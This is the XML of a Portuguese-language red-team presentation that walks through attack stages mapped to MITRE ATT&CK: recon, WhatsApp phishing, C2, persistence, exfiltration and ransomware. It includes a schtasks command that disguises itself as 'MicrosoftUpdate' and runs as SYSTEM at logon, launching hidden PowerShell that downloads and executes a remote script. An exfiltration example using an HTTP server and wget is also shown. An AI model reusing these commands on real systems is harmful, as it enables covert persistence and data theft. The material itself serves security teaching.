            <a:ext cx="10627500" cy="4258056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7EDBBD81-CA63-8D23-9650-145D4401980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253184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08D18BD-74D9-29E6-88BA-2CE67BF1D4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337896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2C234549-BFA1-0667-7565-5FBD1CF2E80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717758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698636EE-E8BF-B4E3-47E0-8E7DF0349DB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8643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F910E21F-7E2B-D87C-3346-F197DA52F54D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3713977" y="1194691"/>
            <a:ext cx="777831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Execução: Execução de código malicioso (T1059)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E53E09-7883-D79A-368A-7F9EFD0F278C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267660" y="1904420"/>
            <a:ext cx="82421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r>
              <a:rPr lang="pt-BR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Fazer com que a máquina alvo se conecte no C2 do atacante.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Exemplo de C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://github.com/BishopFox/sliver</a:t>
            </a:r>
            <a:endParaRPr sz="1600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C07617-C8C9-5451-6ADA-350EA4BD43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7660" y="2850113"/>
            <a:ext cx="7524750" cy="1095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4A40DA-D911-8B20-7817-AB813ECD6E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7660" y="4137792"/>
            <a:ext cx="8629650" cy="1028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98463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9738EC07-44BB-F093-EED7-A40D413B6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1A10F90F-E068-3428-15E4-3991E6AF0575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="337896"/>
            <a:ext cx="10627500" cy="6331617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8C8A2B8E-B4F9-761D-1F23-B58B055163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575" y="-184966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5FC86455-2FB3-4459-7368-B5B5963544C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47" y="-100254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F9CFDC47-1463-C5EA-B464-763649BF83E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1920" y="279608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B8BD3960-88D4-D268-C15A-9DE0E4377C8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71868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3820AA5C-BC1C-CF11-56D3-D454C3373473}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731762" y="272537"/>
            <a:ext cx="777831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Persistência: Persistência via Tarefas Agendadas  (</a:t>
            </a:r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T1053.005</a:t>
            </a:r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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62786001-8440-6839-DDB3-0B7EFC94AB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267658" y="1336489"/>
            <a:ext cx="857438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r>
              <a:rPr lang="pt-BR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Manter acesso ao sistema mesmo se for reiniciado, se o usuário trocar a senha ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684D4447-D2BB-6E76-A2F0-F5C800611472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267657" y="2025035"/>
            <a:ext cx="8574385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 sz="16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schtasks</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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tn</a:t>
            </a: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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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MicrosoftUpdate</a:t>
            </a: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" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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</a:t>
            </a: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"powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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WindowStyle</a:t>
            </a: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Hidden -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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NoP</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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NonI</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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Exec</a:t>
            </a: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6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Bypass</a:t>
            </a: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-Command \"IEX(New-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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Object</a:t>
            </a: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6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Net.WebClient</a:t>
            </a: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  <a:r>
              <a:rPr lang="pt-BR" sz="16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DownloadString</a:t>
            </a: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('http://172.22.196.126:443/atualizacao.ps1')\"" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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</a:t>
            </a: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6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onlogon</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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ru</a:t>
            </a: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SYSTEM /f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08D9A2D-BE26-AC8A-F80C-D56BC4EA19BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250040" y="2096974"/>
            <a:ext cx="8656915" cy="15180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887CBDFF-9CA8-105A-F4A7-E0F69B7D3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94810"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1250040" y="3737229"/>
          <a:ext cx="8572500" cy="28635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900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3939650759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3874245287"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3365500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1450902658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b="1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Argumento</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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b="1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Descrição</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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b="1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Motivo de Persistência</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="37472381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u="none" strike="noStrike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/create</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="444746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u="none" strike="noStrike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Cria uma nova tarefa.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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u="none" strike="noStrike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150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3071919749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u="none" strike="noStrike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/tn "MicrosoftUpdate"</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="444746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Nome da Tarefa. Usa um nome que imita um processo legítimo do sistema para se camuflar.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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u="none" strike="noStrike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Camuflagem (Defesa Evasão)</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="983072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u="none" strike="noStrike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/tr "..."</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="444746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Task </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1150" u="none" strike="noStrike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Run</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="115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(O comando a ser executado).</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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u="none" strike="noStrike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Ação Maliciosa</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="231963781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u="none" strike="noStrike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-WindowStyle Hidden</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="444746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u="none" strike="noStrike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Oculta a janela do PowerShell para que o usuário não veja a execução.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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u="none" strike="noStrike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Furtividade</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3857605391"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="450596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u="none" strike="noStrike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/sc onlogon</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="444746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Schedule </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1150" u="none" strike="noStrike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Type</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="115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 Executa a tarefa sempre que qualquer usuário faz </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1150" u="none" strike="noStrike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logon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="115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  <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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u="none" strike="noStrike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Persistência (Gatilho)</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="348981684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u="none" strike="noStrike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/ru SYSTEM</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="444746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u="none" strike="noStrike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Run</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="115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As </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1150" u="none" strike="noStrike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User</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="115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 Executa a tarefa com privilégios de sistema (máximo).</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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u="none" strike="noStrike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Elevação de Privilégios</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3601265755"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="570230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/f</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="444746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Force. Força a criação da tarefa, substituindo uma existente com o mesmo nome.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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pt-BR" sz="115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Confiabilidade da Persistência</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1150" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="1B1C1D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6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="653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949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71C3A7B6-C15D-EC53-9978-76B7D7127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6CD26684-0685-F157-627B-0522C07CE390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="886969"/>
            <a:ext cx="10627500" cy="5084064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5A376399-2659-5BD2-323C-F52EEEC50A0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-11992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DC7059F0-0990-6A94-6FF4-DF1A2727475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72720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888E04EE-3527-CF0B-2B47-088D123128F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452582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1E47D779-04B0-31B1-843C-A8EA561DFC3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01177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C65BD998-18AA-2954-3F72-37828EEADBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874645" y="886968"/>
            <a:ext cx="777831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Exfiltração: Exfiltração via protocolo de rede (T1041)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD8F59FF-6FBF-C03A-5A58-5769DF757D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298662" y="1796523"/>
            <a:ext cx="82421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r>
              <a:rPr lang="pt-BR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Enviar os arquivos da máquina alvo para os atacantes (normalmente via C2).</a:t>
            </a:r>
            <a:endParaRPr sz="1600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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6B1DD88-D05B-28C3-88D4-2849400911F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298662" y="2716700"/>
            <a:ext cx="8574385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Exfiltração via HTTP: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Máquina vítima: Subir um servidor HTTP na máquina alvo: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python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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80</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"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endParaRPr lang="pt-BR"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Máquina atacante: Acessar o IP da vítima no browser (http://&lt;alvo&gt;:1234) ou baixar via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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8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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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&lt;alvo&gt;:1234/arquivo.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="878850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20B19C5A-5B04-5E54-16A7-4E07A6035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C9A81253-AA43-AA70-4FFE-EEAA829955F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="809625"/>
            <a:ext cx="10627500" cy="5859888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B57D214C-82D9-DC8A-8389-7ED49008EDE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5534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6904B275-BF6A-1EC6-03F5-1965495E940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90246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6498C0C3-235A-4DDC-1E10-5BD80ACB65F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470108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27480139-AA91-5852-682E-75A03414E9B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8643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EBC694FA-EC8E-B293-1053-CA0BA1D0AB22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="788796"/>
            <a:ext cx="7335626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Ransomware</a:t>
            </a:r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: Criptografia dos dados e extorsão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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2909B21-7D90-E4F3-5FC1-35C4B88A4FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290469" y="1558700"/>
            <a:ext cx="8242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r>
              <a:rPr lang="pt-BR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Criptografar os arquivos e cobrar para descriptografar.</a:t>
            </a:r>
            <a:endParaRPr sz="1600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ED21F03-BD26-B72A-6193-EE2204E17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67" y="1951920"/>
            <a:ext cx="8034408" cy="46514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82901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86692795-7FDA-BC61-B3FD-0E2403C4D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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAD7E94-2F25-4352-D685-F07DBB01060A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7A8C744A-BCF1-0EEF-8393-BA1AD35EB2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7996" y="5021943"/>
            <a:ext cx="2955897" cy="1531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964636B3-61E4-897B-D89C-3D1663F01F5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386" y="275772"/>
            <a:ext cx="3039959" cy="1574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 descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B943AF8-032B-F2BB-80EA-6A9F8AE55BD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04629" y="1529298"/>
            <a:ext cx="6582741" cy="379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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EEB04DD-90A2-7994-3F69-9DBE5148E31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59365" y="1607416"/>
            <a:ext cx="9278840" cy="379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C0C1910A-57FA-DAD1-658E-0EB17D4EC0B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63494" y="1529298"/>
            <a:ext cx="3662266" cy="61160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7;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8892143-1E24-5091-0619-F86BE3F91048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450568" y="2203704"/>
            <a:ext cx="7013472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pt-BR" sz="8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lgerian" panose="04020705040A02060702" pitchFamily="82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OUTROS Casos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3385338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764450" y="1325025"/>
            <a:ext cx="10627500" cy="5116500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187725" y="2219961"/>
            <a:ext cx="82143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 algn="just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Lucas Farias - 24 anos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Formado em Análise e Desenvolvimento de Sistemas pela FSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Pós-graduado em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Ethical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Hacking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 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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CyberSecurity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 pela </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Unicv</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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ublic Sans Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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6 anos de experiência em SI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Red Team Tech Lead </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Líder Técnico em dezenas de Pentests em empresas nacionais e internacionais</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Bug Hunter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Autor da CVE-2023-31893 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Possuí as certificações PNPT, CEH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Practical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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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eJPT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 e CAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Palestrante - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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MindTheSec2023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 (Operação Red Team, do zero ao Domain Admin) e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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H2HC 2024 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(Chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Exploits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: Como Combinar Múltiplas Vulnerabilidades para Aumentar o Impacto)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Google Shape;108;p3" descr="For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454352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539064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918926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02028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25F49255-DD0F-CFD6-65CC-6C7B6CA92E51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="1394698"/>
            <a:ext cx="3720956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Public Sans Black"/>
              </a:rPr>
              <a:t>Whoami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3613BBE1-9730-A225-5AE8-DC16EF6A6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8A2B8A1E-4678-AA2B-3EEE-D906C728FB45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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9CA77093-4E24-6A7E-52D9-57CDED0504B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253184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83D9D32E-C23C-2AB7-3924-C97B86E1559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337896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EECDC8DB-01DC-AB9B-8F59-F08471DCCE2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717758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E730CFF9-FEA7-E45F-760A-58ED9FF1359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8643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BBC85DBD-8E32-DD06-EF4A-A56A31444094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="777831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Recon</a:t>
            </a:r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: Varredura de serviços expostos (T1595)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AD11B2A-5EF3-DD6B-6277-7A7848B347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793" y="2275634"/>
            <a:ext cx="7316707" cy="4318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131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B47E98-8A9A-4252-E461-3E24A593E5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="1848317"/>
            <a:ext cx="843285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pt-BR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Encontrar servidores com portas de acesso remoto abertas, como SSH, RDP,  SMB ...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234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ABA19A1F-424B-FA9F-A1C9-2D615178D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1EC50F05-E903-D5D8-64B9-1AC901CBFB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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0ACDEB78-3821-E4CB-4D3A-1FBC0A89D3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253184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44E57BDA-47D8-75C8-2EB3-D4AABB66907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337896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8B6FE170-0275-526A-10CA-C782DCD1E5D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717758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26605CF0-BCF1-73CC-B701-06D145BECFF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8643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A0232017-1925-A84E-0CC6-60E469341F02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3792622" y="1246487"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F05BAE97-416D-6D27-0AB0-955DCE002408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255794" y="2095459"/>
            <a:ext cx="883003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r>
              <a:rPr lang="pt-BR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pt-BR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Obter acesso a máquina da vítima via phishing/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600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spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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phishing com foco no WhatsApp.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5A2564-0413-3E64-D39D-7029CE89F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29" y="3776278"/>
            <a:ext cx="3964198" cy="25767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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA89FBB-DDB9-EF69-8D1E-13F69531AA5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255794" y="2957529"/>
            <a:ext cx="422984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Mensagem recebida no WhatsApp:</a:t>
            </a:r>
            <a:endParaRPr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7CF15B-0FD7-AE2B-5A58-CF412F587F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8736" y="3933644"/>
            <a:ext cx="3828794" cy="4954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6FF2C67-C76A-3CA1-1019-9E3C67EC2F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5638" y="4922700"/>
            <a:ext cx="4894990" cy="12557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50163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B5849D20-D980-C25D-48D8-B593740EB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D822A847-9C58-4D84-D57B-DD4D71A38BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038350" y="419100"/>
            <a:ext cx="9353600" cy="6362700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D8EC6A12-EB0D-2EA2-85D3-E364A35C099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253184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68438F3-F410-1D09-1847-F6DD90AC624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337896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325CD4D2-4A46-1915-34A2-C79583CF48B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717758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516C49E9-8E24-B9B0-5FD8-CE08541A045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8643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A9149ECD-6A65-6F3A-7854-7762AC5D9F35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
